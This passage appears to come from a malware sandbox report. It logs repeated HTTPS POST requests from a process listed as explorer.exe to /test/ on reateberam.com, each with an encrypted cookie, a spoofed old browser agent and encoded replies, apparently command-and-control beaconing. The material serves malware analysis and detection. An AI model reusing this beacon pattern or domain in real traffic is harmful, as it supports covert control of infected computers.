                                                                  Cookie: aXLYGobmm+hkZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:07 UTC793INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f5LmrqrYTK6bIGA9o0QYyy6T08O31z3JYJ%2BccO8idmwqA4mupz%2BEddJQC1SUa4fiU%2BpxK%2Bxm08i5vfSqSC9kiGGXKKqA37k21zT6sNxC7jH9BTOwUX5xb7l090EForg5fA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd226fac87a216-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=16260&min_rtt=14019&rtt_var=6858&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=208288&cwnd=32&unsent_bytes=0&cid=c1a438e821262c35&ts=810&x=0"
                                                                  2024-12-02 17:46:07 UTC343INData Raw: 31 35 30 0d 0a 4f 79 53 56 54 4d 57 37 33 49 70 76 59 68 33 66 67 57 47 73 79 6e 5a 47 4f 6b 33 52 41 30 36 71 61 50 61 7a 75 69 50 4f 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 52 75 49 55 63 73 65 35 43 4f 69 31 34 67 41 62 43 37 74 75 30 4c 73 35 43 6f 72 63 6f 38 67 69 56 56 47 32 70 45 37 63 58 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 47 38 41 7a 41 4f 72 6e 4a 48 4d 59 61 4c 58 42 66 48 49 71 71 34 5a 44 37 46 44 62 41 42 38 70 67 55 6f 35 4d 46 49 50 4f 4d 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 5a 57 54 70
                                                                  Data Ascii: 150OySVTMW73IpvYh3fgWGsynZGOk3RA06qaPazuiPOKRib7xuPoA21j4bUizRuIUcse5COi14gAbC7tu0Ls5Corco8giVVG2pE7cXsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4G8AzAOrnJHMYaLXBfHIqq4ZD7FDbAB8pgUo5MFIPOMC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfZWTp
                                                                  2024-12-02 17:46:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  29192.168.2.550017172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:08 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:09 UTC790INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:09 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LK3nItjYEIFNH9xjAXdoiSRR%2BddkR4Nrs2%2FyQNkbwWoEqeeN7y4upSsKqCBIawXtr2HPWqL5%2FZkBT4jaRr5QL11z9aSDAibmweWEbeUEulSuieqtkn5MA9aEPPpi9RN8YQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd227d08f618fa-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1627&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=1725768&cwnd=128&unsent_bytes=0&cid=f910c219f97c1cfe&ts=766&x=0"
                                                                  2024-12-02 17:46:09 UTC343INData Raw: 31 35 30 0d 0a 50 69 57 66 54 63 4f 77 74 75 52 6c 5a 78 37 61 68 6d 36 73 79 33 4e 49 4f 45 72 66 42 55 36 72 5a 76 36 36 76 79 2f 46 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 4e 70 4a 45 41 6f 66 70 75 4f 67 56 67 6b 44 37 61 39 75 4f 30 4f 73 35 65 70 70 63 45 2b 67 69 68 51 47 6d 56 45 36 73 48 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 4d 41 34 42 65 37 68 54 68 51 57 61 37 62 43 66 48 4e 68 37 6f 5a 4f 37 31 44 62 44 33 5a 42 68 55 30 30 4f 56 4d 41 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4e 2f 46 53 51 35
                                                                  Data Ascii: 150PiWfTcOwtuRlZx7ahm6sy3NIOErfBU6rZv66vy/FKRib7xuPoA21j4bUizNpJEAofpuOgVgkD7a9uO0Os5eppcE+gihQGmVE6sHsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EMA4Be7hThQWa7bCfHNh7oZO71DbD3ZBhU00OVMAcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZN/FSQ5
                                                                  2024-12-02 17:46:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  30192.168.2.550018172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:10 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:11 UTC790INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9oQxTHnI3RPbdysIKgmerYxZVYwKEHymKmF2KZVBHmjp31vpLKg237fou1ldQyakqcu4wCT%2B5eSLAnEsXmBvss6%2BGKZIsrNtQqpPthOb5tBm90oq3kr%2BnVaJXjlkfYrAKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd2289bb35236b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1892&min_rtt=1879&rtt_var=714&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=1554018&cwnd=172&unsent_bytes=0&cid=6ff7e37b1905ff25&ts=756&x=0"
                                                                  2024-12-02 17:46:11 UTC343INData Raw: 31 35 30 0d 0a 4f 53 6d 63 51 63 47 77 33 6f 70 69 5a 52 37 63 6a 47 48 6b 67 33 35 4c 4f 30 6e 57 44 53 50 43 62 66 6d 30 76 69 58 46 5a 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 70 4c 30 34 71 63 35 62 6e 37 46 67 6b 44 4c 71 2b 74 4b 6c 47 74 35 61 6e 70 4d 41 33 35 45 35 56 47 32 4e 4c 36 38 72 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 4d 73 7a 42 75 4c 68 4a 58 4d 55 61 4c 37 49 66 58 6b 76 71 34 4a 42 37 46 58 55 41 52 6b 70 68 45 38 2b 4d 56 4d 49 50 63 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 4e 56 51 35
                                                                  Data Ascii: 150OSmcQcGw3opiZR7cjGHkg35LO0nWDSPCbfm0viXFZ2mcphSGpB6yiJiVjA1pL04qc5bn7FgkDLq+tKlGt5anpMA35E5VG2NL68rsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EMszBuLhJXMUaL7IfXkvq4JB7FXUARkphE8+MVMIPcC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfNVQ5
                                                                  2024-12-02 17:46:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  31192.168.2.550019172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:12 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:13 UTC789INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8WSlgi3X7Jaf6FEPyIUYaASL7O1jCFVXrcMV5CbMOkgp%2BIjOmZHW%2B1LicBbKJ5tOAJvBYXQVew7fW3g8QTGyHbkB71GU02LmihuvNthWX6xFUh9fDIKUrCEld9t5CYJzTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22976a5da250-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13709&min_rtt=13702&rtt_var=5153&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=212147&cwnd=32&unsent_bytes=0&cid=0a9aca3a71fe5733&ts=700&x=0"
                                                                  2024-12-02 17:46:13 UTC347INData Raw: 31 35 34 0d 0a 4f 79 71 56 51 63 71 78 30 59 70 69 5a 52 33 66 6a 57 44 6b 67 33 64 4c 50 55 7a 66 42 53 50 43 62 50 75 78 74 79 62 4c 59 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6e 49 30 4d 73 63 35 54 6d 37 46 73 6d 43 4c 53 32 73 4b 4a 47 73 5a 4f 74 70 63 6f 35 36 55 35 63 48 32 4a 4b 36 38 71 6d 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 73 34 42 4f 7a 68 4b 52 31 2b 62 62 66 44 65 58 55 73 34 4d 74 43 35 6c 54 63 44 52 31 48 37 45 34 36 4e 31 6f 4f 4f 6f 58 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 55 54 35
                                                                  Data Ascii: 154OyqVQcqx0YpiZR3fjWDkg3dLPUzfBSPCbPuxtybLYmmcphSGpB6yiJiVjA1nI0Msc5Tm7FsmCLS2sKJGsZOtpco56U5cH2JK68qmfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kcs4BOzhKR1+bbfDeXUs4MtC5lTcDR1H7E46N1oOOoXMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1UT5
                                                                  2024-12-02 17:46:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  32192.168.2.550020172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:14 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:15 UTC797INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PJFGBEDtZbhz4j3Q75B9F7rO3YH%2BLMpWsQqYRvFbNB1Enfykt2eYHQ3YM%2BtUtHFo0hO0UubVnm7HGhWaXQH%2B2K1VYjyYHAUdOcJ4H7%2FgpKBLsYmrWROD00J3L%2BOCZLHM%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22a4e8f6ab03-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13768&min_rtt=13763&rtt_var=5172&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=211502&cwnd=32&unsent_bytes=0&cid=bcfbaf0065231d20&ts=706&x=0"
                                                                  2024-12-02 17:46:15 UTC343INData Raw: 31 35 30 0d 0a 4d 69 6d 61 51 4d 4f 32 32 49 70 6c 5a 68 33 66 6a 47 48 69 67 33 46 48 4f 6b 72 56 42 53 54 43 61 76 65 31 74 79 44 49 5a 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 74 49 45 38 6a 63 35 66 6a 37 46 63 6a 43 4c 71 37 73 61 4e 47 74 70 61 70 6f 4d 6b 37 37 45 35 53 47 6d 70 50 36 63 53 6f 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 34 32 42 75 50 69 4a 68 35 2b 62 37 37 43 63 6e 41 6f 35 38 74 44 37 56 72 61 44 68 68 47 37 45 73 38 4f 56 4d 4b 4e 73 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 56 52 52 4a
                                                                  Data Ascii: 150MimaQMO22IplZh3fjGHig3FHOkrVBSTCave1tyDIZ2mcphSGpB6yiJiVjA1tIE8jc5fj7FcjCLq7saNGtpapoMk77E5SGmpP6cSofW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc42BuPiJh5+b77CcnAo58tD7VraDhhG7Es8OVMKNsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfVRRJ
                                                                  2024-12-02 17:46:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  33192.168.2.550021172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:16 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:17 UTC789INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:17 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8lDhclwc3PqXjOaTt4FhZ96oxVdPwUuzNbPV3aTMbLDpqyt09uWMmAeSYovX%2F06ZSbtbcwCJ0w%2FiFiwbIdV7hrBULlMT8OsFfufIfXtnzIIAXt2%2FMh9jbpIPDhmw3SPJkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22b1df438c60-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1780&rtt_var=699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=1531200&cwnd=47&unsent_bytes=0&cid=5ebac1c8ffb2b61f&ts=763&x=0"
                                                                  2024-12-02 17:46:17 UTC339INData Raw: 31 34 63 0d 0a 4d 69 57 62 52 73 71 32 32 6f 70 76 5a 52 2f 66 68 47 54 6c 67 33 42 4e 4f 55 6a 53 41 43 4c 43 5a 76 32 77 75 53 50 46 59 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 76 4c 6b 59 6f 65 5a 72 6c 37 46 38 67 43 62 43 39 74 61 4e 47 75 70 43 72 72 4d 67 37 35 45 35 56 47 6d 4e 46 37 73 53 6a 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 77 77 41 75 6a 6b 54 68 6b 52 62 37 58 41 66 48 4e 68 37 6f 4a 45 36 31 44 56 5a 78 39 46 67 45 45 2f 4d 31 6c 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 6c 50 76 64 56 54 70
                                                                  Data Ascii: 14cMiWbRsq22opvZR/fhGTlg3BNOUjSACLCZv2wuSPFYmmcphSGpB6yiJiVjA1vLkYoeZrl7F8gCbC9taNGupCrrMg75E5VGmNF7sSjfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcwwAujkThkRb7XAfHNh7oJE61DVZx9FgEE/M1lEA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvblPvdVTp
                                                                  2024-12-02 17:46:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  34192.168.2.550022172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:19 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:19 UTC795INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:19 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iD7aO61uESAqzkm9u9cLeUQkWWIcsy0khixu7wMxl1eZjjf5HhuPZ5e5CZ9v49%2FlrWOQcxWsmVV9%2B8%2B6r1dxvYa%2BxADEB%2BrZpJZT6zQ1VGhVPDSWBpSkzlvOLWATbDeRsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22bf4a8cebb6-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14134&min_rtt=14124&rtt_var=5318&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=205474&cwnd=32&unsent_bytes=0&cid=b00c6c01c424fe9e&ts=877&x=0"
                                                                  2024-12-02 17:46:19 UTC343INData Raw: 31 35 30 0d 0a 4d 69 2b 56 52 63 71 36 30 59 70 6e 61 68 6e 5a 67 57 62 6e 67 33 46 47 4f 6b 37 58 41 6b 36 75 5a 76 2b 79 74 79 37 49 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 35 72 49 30 38 6a 65 4a 47 4f 67 46 63 6d 44 72 57 36 74 65 30 49 73 5a 75 72 70 73 67 33 67 69 5a 64 47 6d 42 4b 37 4d 58 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 73 34 79 42 2b 33 6e 4a 48 4d 5a 62 72 62 49 66 6e 51 74 71 34 52 46 37 31 54 5a 43 78 73 70 68 6b 73 34 4e 31 4d 41 4f 73 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 35 51 51 4a
                                                                  Data Ascii: 150Mi+VRcq60YpnahnZgWbng3FGOk7XAk6uZv+yty7IKRib7xuPoA21j4bUiz5rI08jeJGOgFcmDrW6te0IsZurpsg3giZdGmBK7MXsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4Es4yB+3nJHMZbrbIfnQtq4RF71TZCxsphks4N1MAOsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBf5QQJ
                                                                  2024-12-02 17:46:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  35192.168.2.550023172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:21 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:22 UTC791INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:21 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QeeOglsEMaLi0Bpx2fobbI%2FDZo0oKfG0ajpmTae%2B3Vb9h5MJNZxdcEWinnDOBbf1OCsRZd78u4YRz6uCz%2B1CnYLoPBwibkrSG75k1WJjkzYpynsdqKNWGTyJ1xdrzixPeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22cd1f78aab3-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14355&min_rtt=14338&rtt_var=5411&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=201685&cwnd=32&unsent_bytes=0&cid=69d6bfc79004baac&ts=718&x=0"
